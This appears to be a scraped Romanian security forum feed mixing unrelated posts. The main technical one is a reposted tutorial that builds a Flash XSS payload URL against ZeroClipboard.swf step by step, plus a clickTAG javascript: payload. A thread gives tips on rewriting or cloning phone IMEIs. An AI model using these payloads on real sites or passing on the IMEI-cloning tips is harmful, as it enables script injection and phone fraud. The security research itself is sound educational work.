Leaderboard

Implementing an Obsolete VPN Protocol on Top of HTTP: Because Why Not? Posted by Niklaus Schiess Recently I’ve started some research on MikroTik’s RouterOS, the operating system that ships with RouterBOARD devices. As I’m running such a device myself, one day I got curious about security vulnerabilities that have been reported on the operating system and the running services as it comes with tons of features. Searching for known vulnerabilities in RouterOS on Google doesn’t really yield a lot of recent security related stuff. So I thought, there is either a lack of (public) research or maybe it is super secure… Not really satisfied with the outcome of my research about previous research one day I thought I give it a shot and just take a quick look at the management interfaces, mainly the web interface. As it turns out, there could be a third explanation for the lack of security related search results on Google: obfuscation. The communication of the web interface is obfuscated, most likely encrypted, which may discourages researchers that just came around to search for low hanging fruits. RouterOS WebFig RouterOS is a proprietary operating system for routers, based on Linux. It is available for various architectures, including x86. It can be downloaded directly from the vendor’s page and is usable for a couple of days without buying a license, which makes it really nice for researching. RouterOS provides different interfaces for device management: Winbox is a native application for Windows WebFig is a web interface Access to a Cisco-like shell via SSH/Telnet An API that is not enabled by default This blog post will cover the WebFig interface running on TCP port 80. By default there is no HTTPS interface available (which would lead to using untrusted certificates anyway). However, the release notes of RouterOS 5.5 state: “webfig – encrypt whole session even in non https mode;”. Here it becomes quite interesting. The question is: how are they actually encrypting HTTP traffic without using SSL/TLS? I’ve fired up Burp and started to inspect the HTTP request of WebFig. Articol complet: https://www.insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/

@wirtz

Il urmareau extraterestrii prin calorifer, SRIul, CIA, NSA, SIE nu poti folosi functia NFC

Salut, in primul rand, nu mai poti folosi functia NFC. In al doilea rand, nu afecteaza indepartarea antenei NFC durata bateriei.

Mai bine il duci la un service daca nu ai mai facut asta.

25 MAY 2016 on security Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than those of PHP developers. To start, unfortunately you can't do "right mouse click, view-source" on a flash file but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html To demonstrate how I analyze a flash file I'm going use the banner.swf file and the zeroclipboard.swf cross-site scripting for example of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that has been made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14). banner.swf This vulnerability is pretty basic. When the clicktag function in Actionscript allows unfiltered user input it can used to inject javascript url's for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode: on (release) { geturl (_root.clickTAG, "_self"); } on (release) is a trigger that execute a code when the mouse is pressed and _root.clickTAG stands for the clickTAG parameter which is not escaped or what so ever and is therefor vulnerable for cross-site scripting attacks. The vulnerability could be reproduced by going to the following these steps: Go to banner.swf?clickTAG=javascript:alert(1) A press on the page (anywhere in this case) zeroclipboard.swf Zeroclipboard is a library used to modify the users clipboard often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable for this vulnerability so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here:http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf I decompiled the source using showmycode: package { import flash.events.*; import flash.display.*; import flash.external.*; import flash.system.*; import flash.utils.*; public class ZeroClipboard extends Sprite { private var button:Sprite; private var id:String = ""; private var clipText:String = ""; public function ZeroClipboard(){ super(); stage.scaleMode = StageScaleMode.EXACT_FIT; Security.allowDomain("*"); var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); button.addEventListener(MouseEvent.CLICK, clickHandler); button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null); }); button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null); }); button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null); }); button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null); }); ExternalInterface.addCallback("setHandCursor", setHandCursor); ExternalInterface.addCallback("setText", setText); ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null); } public function setHandCursor(_arg1:Boolean){ button.useHandCursor = _arg1; } private function clickHandler(_arg1:Event):void{ System.setClipboard(clipText); ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); } public function setText(_arg1){ clipText = _arg1; } } }//package The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); What we have to do now is find out how this function get's triggered. The example I used sits within a function called clickHandler so I did a quick search for clickHandler and found that it get's triggered when there is a click on a element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created: button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); By looking at this part you might already have noticed the 5th line. button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); This part determines the width and height of the button sprite by using two variables. flashvars.width and flashvars.height. To find out where this parameters are set we don't have to look very far. By searching for flashvarsit's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height from the button element we have to add two parameters to the zeroclipboard.swf file in the url. Now, when the mouse is hovered over the button the function clickHandler will be called which triggers our vulnerable part of code that we want to reach. /zeroclipboard.swf?width=1000&height=1000 Now we have to exploit the vulnerable part of code, let's get back to the vulnerable line: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); The id variable actually is user input, you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..) To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExterinalInterface.call The code looks like this: try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; } User input is located at "USER INPUT HERE" so there is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing "because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into: try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; } All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload JavaScript will see everything behind it as a command try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; } Because we shopped of the end of the function it now looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\" This is invalid JavaScript but we can fix that! Let's start by ending two the functions ZeroClipboard.dispatch and __flash__toXML Our payload now looks like this: \"))// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\")) Now we have to end the try statement, we do this by using } catch(e) {} Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {} This is perfectly valid JavaScript, all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final url: /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 List of known vulnerable flash files I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs The list Flashbang An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github available here:https://github.com/cure53/Flashbang Resources http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/ https://github.com/DBA/swf_file https://github.com/cure53/Flashbang https://github.com/zeroclipboard/zeroclipboard/issues/14 http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html smiegles Read more posts by this author. Sursa: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/

Caut programatori cu experienta (5-10 ani) Cerinte: - Bun cunoscator php, mysql, javascript (css/html/bootstrap) - Cunostinte platforme open source (exemplu: wordpress) - Capacitatea de a comunica si de a lucra in echipa - Disponibilitate job full time (Bucuresti/Universitate) Beneficii: - Pachet salarial bun (1000-5000 EURO, in functie de experienta) - Training, cursuri (te sustinem daca vrei sa inveti) - Cafea, ceai, carti la discretie (se va lucra intr-un mediu foarte relaxat) - Colegi tineri si deschisi la minte ;-) Daca indeplinesti conditiile, imi poti trimite CV-ul tau / proiecte la adresa office@kapye.com ori PM.

Am un utok 351D cu alt imei si merge perfect nu am probleme cu mesajels/apelurile.

Se poate rescrie, daca ne spui si modelul, eu la ZTE Blade L2 am reusit sa il rescriu, ma jucam cu rom-urile si am pus ceva in spanionala si am uitat sa fac backup la imei si s-a dus, dupa am cautat pe ztedevices rom-ul pentru romania, am deschis telefonul am vazut pe baterie imei-ul si l-am rescris cu xposed acuma am si backup la el, oricum nu merge la orice tel

Nu poti sa faci tu singur treaba asta. Trebuie sa il duci la un service, fara box nu poti face treaba asta, nu ai cum sa citesti IMEI-ul care il are el defapt si sa il rescrii. Pot fi 2 telefoane cu acelasi imei, dar e mai complicat. De exemplu, daca eu am un telefon X cu imei 000000000000001 si tu pe al tau Samsung Galaxy Alpha ii rescrii alt imei decat cel original, si acesta sa fie chiar imei-ul de la telefonul meu X, cand telefonul meu este pornit, sun, sunt sunat, trimit mesaje, etc. Tu iti vei putea folosi telefonul doar cand al meu este inchis sau nu am semnal, doar atunci al tau va fi activ, vei putea sa suni, sa fi sunat, sa trimiti mesaje, etc. Asta mi-a spus-o un meserias calumea de la mine din oras, prieten de familie. Nu am testat personal.

Da, se paote. Un prieten a reusit sa-si steraga imei-ul telefonului, avea un allvie p5 life daca nu ma insel.Fara imei, telefonul nu-i mai citea nimic.A reusit sa il rescrie, dar TREBUIE SA FIE IMEI UL TELEFONULUI, il poti gasi sub baterie de obicei. Daca ai acelasi imei ca al altui telefon, nu stiu exact ce se intampla, dar e ciudat ca de ex in baza de date de la orange sa apara 2 telefoane cu acelasi imei.

http://www.wtfandroid.com/how-to-change-imei-number-easily-on-android-100-working/

Ce model este? Daca are procesor mtk, ii dai restore la un imei.bak de pe alt telefon cu mobile uncle (necesita root).

Ma intreb de ce va chinuiti sa-i raspundeti la intrebari vazand nick-ul lui :))))))

http://www.hotnews.ro/stiri-alegeri_locale_2016_bucuresti-21042902-video-cum-functioneaza-sistemul-informatic-care-monitoriza-votul-alegerile-locale-duminica-18-616-tablete-care-vor-scana-cnp-urile-alegatorilor.htm Sistemul informatic de monitorizare a prezentei la vot si de prevenire a votului ilegal, un sistem care va conecta toate sectiile de vot din tara la o baza de date comuna, va permite un schimb de informatii in timp real si va functiona si la centrul de comanda al MAI pentru a depista tentativele de vot ilegal. - si pe MAI cine-i verifica sa nu bage voturi ilegale? Şo' pe ei h4x0rilor si decideti-va singuri viitorul

Nu suntem site de licitatii,spune un pret.

Anti-Sandbox and Anti-Virtual Machine Tool (Turkish : https://github.com/AlicanAkyol/sems/blob/master/Readme_Turkish.md) ( Sha1 (sems.exe) : 06598E9948C2E256C871E66B5578D51A1886758F) Modern malwares are equipped with anti-analysis techniques in order to evade analysis. It is common for malwares to check for the presence of any virtualization environment, any malware analysis sandboxes or any analysis tools during runtime. sems is a tool which is created to help malware researchers by checking their environments for the signatures of any virtualization techniques, malware sandbox tools or well know malware analysis tools. sems is using the same techniques and looking for the same footprints that evasive malwares do in order to detect if it is running in a controlled environment. So it is useful for malware researchers to check if the analysis environment is inevasible. How it works? Virtual Machine Once the tool is run in a virtual machine(Virtualbox, Vmware, Qemu), it performs all the checks which are shown below and drops logs to the console about detected signatures until the "control" text is shown. In addition to that a separate .txt file with the finding name is created in the running directory for each detected signatures. Example; vboxBios.txt will be created for virtualbox bios signature. Malware Sandbox sems tool is sent to malware sandbox like any other malware samples and waited until the completion of analysis. Detected signatures can be seen in "File Operations" section of the sandbox report hence sems drops separate .txt files for each findings. Sursa: https://github.com/AlicanAkyol/sems

Aveti grija cu milogul asta ''ydx90'' promite, incaseaza si dispare...

Salut, Am pont de facut bani: munca. Incercati, si dupa 1an veniti sa-mi spuneti daca a functionat.

Din variantele tale as zice "metoda " desi mi se pare prea pompos. Banii nu apar, peste noapte, prima data se depune mult efort inainte sa vezi primii bani, deci spun si pentru cei care spera la castiguri rapide, nu stiu prin care te culci cu 5 lei ramasi pe card ca nu da bancomatul marunti si te trezesti 1000

Ma doare-n pula cand vad atata prostie.Vai de plm.

Asta inseamna sa fii hacer bv bine gandit dar nu are rost sa le faci rau oamenilor :)... fii un white nu deep